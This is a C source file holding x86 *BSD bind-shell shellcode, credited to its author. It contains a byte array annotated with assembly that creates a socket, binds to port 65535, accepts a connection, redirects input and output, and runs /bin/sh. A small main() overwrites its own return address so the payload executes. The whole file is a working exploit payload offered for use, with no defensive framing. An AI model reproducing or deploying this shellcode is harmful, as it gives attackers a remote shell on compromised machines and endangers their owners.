/*
 * portbind, execve /bin/sh *BSD x86 shellcode by BreeZe <breeze@binbash.org>
 */

#define info    "bind execve /bin/sh /bin/sh 0 to port 65535"

#include <stdio.h>

char shellcode[] =    

/* jump to G2C */
"\xeb\x76"			// jmp    80480f8 <G2C>

/* start <shellcode> */
"\x5e"				// pop    %esi
"\x31\xc0"			// xor    %eax,%eax
"\x88\x46\x07"			// mov    %al,0x7(%esi)

/* socket */
"\x6a\x06"			// push   $0x6
"\x6a\x01"			// push   $0x1
"\x6a\x02"			// push   $0x2
"\xb0\x61"			// mov    $0x61,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* bind */
"\x89\xc2"			// mov    %eax,%edx
"\x89\xc1"			// mov    %eax,%ecx
"\x89\xc3"			// mov    %eax,%ebx
"\x31\xc0"			// xor    %eax,%eax
"\xc6\x46\x09\x02"		// movb   $0x2,0x9(%esi)
"\x66\xc7\x46\x0a\xff\xff"	// movw   $0xffff,0xa(%esi) (port: 65535 -> 0xffff)
"\x89\x46\x0c"			// mov    %eax,0xc(%esi)
"\x6a\x10"			// push   $0x10
"\x8d\x46\x08"			// lea    0x8(%esi),%eax
"\x50"				// push   %eax
"\x52"				// push   %edx
"\x31\xc0"			// xor    %eax,%eax
"\xb0\x68"			// mov    $0x68,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* listen */
"\x6a\x01"			// push   $0x1
"\x51"				// push   %ecx
"\x31\xc0"			// xor    %eax,%eax
"\xb0\x6a"			// mov    $0x6a,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* accept */
"\x31\xc0"			// xor    %eax,%eax
"\x50"				// push   %eax
"\x50"				// push   %eax
"\x53"				// push   %ebx
"\xb0\x1e"			// mov    $0x1e,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x89\xc1"			// mov    %eax,%ecx
"\x31\xc0"			// xor    %eax,%eax
"\x50"				// push   %eax
"\x51"				// push   %ecx
"\xb0\x5a"			// mov    $0x5a,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x6a\x01"			// push   $0x1
"\x51"				// push   %ecx
"\xb0\x5a"			// mov    $0x5a,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* dup2 */
"\x6a\x02"			// push   $0x2
"\x51"				// push   %ecx
"\xb0\x5a"			// mov    $0x5a,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* execve /bin/sh */
"\x31\xc0"			// xor    %eax,%eax
"\x89\x76\x08"			// mov    %esi,0x8(%esi)
"\x89\x46\x0c"			// mov    %eax,0xc(%esi)
"\x50"				// push   %eax
"\x8d\x56\x08"			// lea    0x8(%esi),%edx
"\x52"				// push   %edx
"\x56"				// push   %esi
"\xb0\x3b"			// mov    $0x3b,%al
"\x50"				// push   %eax
"\xcd\x80"			// int    $0x80

/* G2C */
"\xe8\x85\xff\xff\xff"		// call   8048082 <shellcode>
"\x2f"				// das
"\x62\x69\x6e"			// bound  %ebp,0x6e(%ecx)
"\x2f"				// das
"\x73\x68"			// jae    804816c <G2C+0x74>
;

int
main()
{
	int *ret;
	ret = (int *)&ret + 2;
	printf("Shellcode info = %s\n",info);
	printf("Shellcode length = %d\n",strlen(shellcode));
	(*ret) = (int)shellcode;
}